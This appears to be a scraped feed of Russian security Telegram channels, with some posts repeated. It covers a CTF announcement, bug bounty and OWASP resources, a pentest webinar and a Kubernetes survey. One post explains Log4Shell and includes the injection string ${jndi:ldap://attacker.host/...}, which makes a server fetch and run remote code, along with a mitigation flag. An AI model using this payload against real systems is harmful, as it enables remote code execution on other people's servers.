YauzaCTF 2021 is a task-based competition that will take place online on August 27-29 at 12:00 (UTC+0).
It will give the participants the atmosphere of the Soviet past.
For 48 hours, participants will be able to solve tasks of all categories:
- web, reverse, pwn, forensics, crypto, OSINT, joy.
Also new categories have been added:
- hardware, pentest and emulation!
The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website.
ABOUT EVENT:
🕹 Event website: https://yauzactf.com/en
📃 CTFtime page: https://ctftime.org/event/1417/
🔑 Competition type: task-based competition
📅 Start: on August 27 at 12:00 (UTC+0)
⏰ Duration: 48 hours
👨👨👦👦 Number of people in the team: maximum 7 people
🥇 Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995
It will give the participants the atmosphere of the Soviet past.
For 48 hours, participants will be able to solve tasks of all categories:
- web, reverse, pwn, forensics, crypto, OSINT, joy.
Also new categories have been added:
- hardware, pentest and emulation!
The organizers and sponsors of the event have prepared many interesting prizes. More details on the event website.
ABOUT EVENT:
🕹 Event website: https://yauzactf.com/en
📃 CTFtime page: https://ctftime.org/event/1417/
🔑 Competition type: task-based competition
📅 Start: on August 27 at 12:00 (UTC+0)
⏰ Duration: 48 hours
👨👨👦👦 Number of people in the team: maximum 7 people
🥇 Qualification: students from CIS schools or universities (graduating not earlier than 2021) and those, who born not earlier than 1995
ctftime.org
YauzaCTF 2021
The future is in the past.
This time, YauzaCTF 2021 will give the participants the atmosphere of the Soviet past. ...
This time, YauzaCTF 2021 will give the participants the atmosphere of the Soviet past. ...
Охота за уязвимостями на ДЭГ-2021
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.
Forwarded from Кавычка (Bo0oM)
У половины интернета нашли выполнение произвольного кода через Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Forwarded from Видеоканал Global Digital Space
В 11.00 стартует мероприятие "«Правильный» пентест — мы выбираем, нас выбирают", успейте зарегистрироваться и принять участие.
Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.
Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.
https://github.com/OWASP/ASVS/blob/master/4.0/OWASP%20Application%20Security%20Verification%20Standard%204.0.3-ru.pdf за адаптацию и перевод спасибо Андрею Титову
GitHub
ASVS/4.0/OWASP Application Security Verification Standard 4.0.3-ru.pdf at master · OWASP/ASVS
Application Security Verification Standard. Contribute to OWASP/ASVS development by creating an account on GitHub.
Forwarded from AI Security Lab
📢 OWASP LLM TOP 10: главные риски ИИ-приложений
Топ-10 для приложений LLM 2025 отражает лучшее понимание существующих рисков и вносит важные обновления в то, как LLM используются в реальных приложениях сегодня.
Мы подготовили краткую адаптацию свежего списка OWASP LLM TOP 10 2025 на русском языке в виде статьи на Хабре, чтобы выделить главное.
Топ-10 для приложений LLM 2025 отражает лучшее понимание существующих рисков и вносит важные обновления в то, как LLM используются в реальных приложениях сегодня.
Мы подготовили краткую адаптацию свежего списка OWASP LLM TOP 10 2025 на русском языке в виде статьи на Хабре, чтобы выделить главное.
Хабр
Перевод OWASP LLM Top 10
Список OWASP LLM Top 10 2023 года стал фундаментом для безопасного использования LLM и повышения осведомленности о проблемах безопаности. Проект OWASP Top 10 for Large Language Model...
Forwarded from white2hack 📚
THE OWASP TOP TEN: A RESTAURANT TALE by MoS, 2025
This document uses a restaurant analogy to illustrate the OWASP Top Ten application security vulnerabilities, highlighting common application security flaws.
From a guest 𝘀𝗻𝗲𝗮𝗸𝗶𝗻𝗴 𝗶𝗻𝘁𝗼 𝘁𝗵𝗲 𝗸𝗶𝘁𝗰𝗵𝗲𝗻 (𝗕𝗿𝗼𝗸𝗲𝗻 𝗔𝗰𝗰𝗲𝘀𝘀 𝗖𝗼𝗻𝘁𝗿𝗼𝗹), to 𝗰𝗵𝗲𝗳𝘀 𝘂𝘀𝗶𝗻𝗴 𝗽𝗼𝗶𝘀𝗼𝗻𝗲𝗱 𝗺𝘂𝘀𝗵𝗿𝗼𝗼𝗺𝘀 (Insecure Design), this creative MoS guide serves you the most critical web vulnerabilities, plated with real-world analogies that even your grandma would get.
✅ Simple
✅ Visual
✅ Memorable
#web #fun
This document uses a restaurant analogy to illustrate the OWASP Top Ten application security vulnerabilities, highlighting common application security flaws.
From a guest 𝘀𝗻𝗲𝗮𝗸𝗶𝗻𝗴 𝗶𝗻𝘁𝗼 𝘁𝗵𝗲 𝗸𝗶𝘁𝗰𝗵𝗲𝗻 (𝗕𝗿𝗼𝗸𝗲𝗻 𝗔𝗰𝗰𝗲𝘀𝘀 𝗖𝗼𝗻𝘁𝗿𝗼𝗹), to 𝗰𝗵𝗲𝗳𝘀 𝘂𝘀𝗶𝗻𝗴 𝗽𝗼𝗶𝘀𝗼𝗻𝗲𝗱 𝗺𝘂𝘀𝗵𝗿𝗼𝗼𝗺𝘀 (Insecure Design), this creative MoS guide serves you the most critical web vulnerabilities, plated with real-world analogies that even your grandma would get.
✅ Simple
✅ Visual
✅ Memorable
#web #fun
Forwarded from white2hack 📚
THE OWASP TOP TEN_A RESTAURANT TALE.pdf
31 MB
THE OWASP TOP TEN: A RESTAURANT TALE by MoS , 2025
Forwarded from k8s (in)security (r0binak)
Мировое сообщество
В опроснике есть два новых пункта, которых нет в текущей версии:
Опрос включает в себя ряд вариантов, которые могут быть включены в
Kubernetes Security обращается ко всем, кто интересуется безопасностью Kubernetes. Всё дело в том, что планируется обновить OWASP Kubernetes Top 10 в ближайшее время и сейчас они проводят опрос для сбора идей и отзывов.В опроснике есть два новых пункта, которых нет в текущей версии:
1) Overly exposed Kubernetes Components - This looks at the risks of having Kubernetes components directly attached to the Internet, where they could be attacked.
2) Cluster-to-Cloud Lateral Movement - The risk that attackers might be able to leverage Kubernetes cluster access to expand to other cloud systems.Опрос включает в себя ряд вариантов, которые могут быть включены в
OWASP Kubernetes Top 10, и идея заключается в том, чтобы оценить их от 1 (не должно быть в Top 10) до 5 (обязательно должно быть в Top 10).